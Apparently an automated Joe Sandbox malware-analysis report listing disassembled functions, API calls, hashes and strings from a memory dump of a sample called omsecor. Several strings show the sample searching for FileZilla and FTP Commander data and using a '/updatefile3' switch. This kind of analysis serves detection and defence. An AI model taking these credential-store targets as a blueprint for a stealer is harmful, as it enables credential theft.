                          • Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
                          • Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                          • Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
                          APIs
                          • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                          • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                          • __aulldiv.LIBCMT ref: 004072E3
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: c{@
                          • API String ID: 3735792614-264719814
                          • Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                          • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                          • Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                          • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                          APIs
                          • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                          • __aulldiv.LIBCMT ref: 00407359
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: n(@
                          • API String ID: 3735792614-2525614082
                          • Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                          • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                          • Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                          • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                          • CharLowerW.USER32(?), ref: 0040ABA0
                          • GetCommandLineW.KERNEL32 ref: 0040ABC0
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharCommandFileLineLowerModuleName
                          • String ID: /updatefile3$netprotdrvss.exe
                          • API String ID: 3118597399-3449771660
                          • Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                          • Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                          • Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                          • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
                          APIs
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
                            • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                            • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
                            • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          • CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
                          • SysFreeString.OLEAUT32(?), ref: 0040875A
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                          • String ID: http://$+@
                          • API String ID: 147727044-3628382792
                          • Opcode ID: 6e9e626a4613c0855f5347982540e942ed1617b6e834c0e4f94aa1f1be06abb5
                          • Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
                          • Opcode Fuzzy Hash: 6e9e626a4613c0855f5347982540e942ed1617b6e834c0e4f94aa1f1be06abb5
                          • Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99
                          APIs
                          • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                          • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerWrite
                          • String ID: UniqueNum$x
                          • API String ID: 594998759-2399716736
                          • Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                          • Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$*filezilla*
                          • API String ID: 3438805939-758400021
                          • Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
                          • Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$ftp*commander*
                          • API String ID: 3438805939-1149875651
                          • Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
                          • Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094A9
                          • SysFreeString.OLEAUT32(?), ref: 004094AE
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: _blank$an.yandex.ru/count
                          • API String ID: 3341692771-25359924
                          • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                          • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409868
                          • SysAllocString.OLEAUT32(?), ref: 00409876
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: "URL"$"encrypted"
                          • API String ID: 2525500382-4151690107
                          • Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
                          • Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open
                          • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                          • API String ID: 71445658-3061378640
                          • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                          • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                            • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                            • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                          • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                          • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                          • String ID:
                          • API String ID: 3604167287-0
                          • Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
                          • Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: -
                          • API String ID: 885266447-2547889144
                          • Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
                          • Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE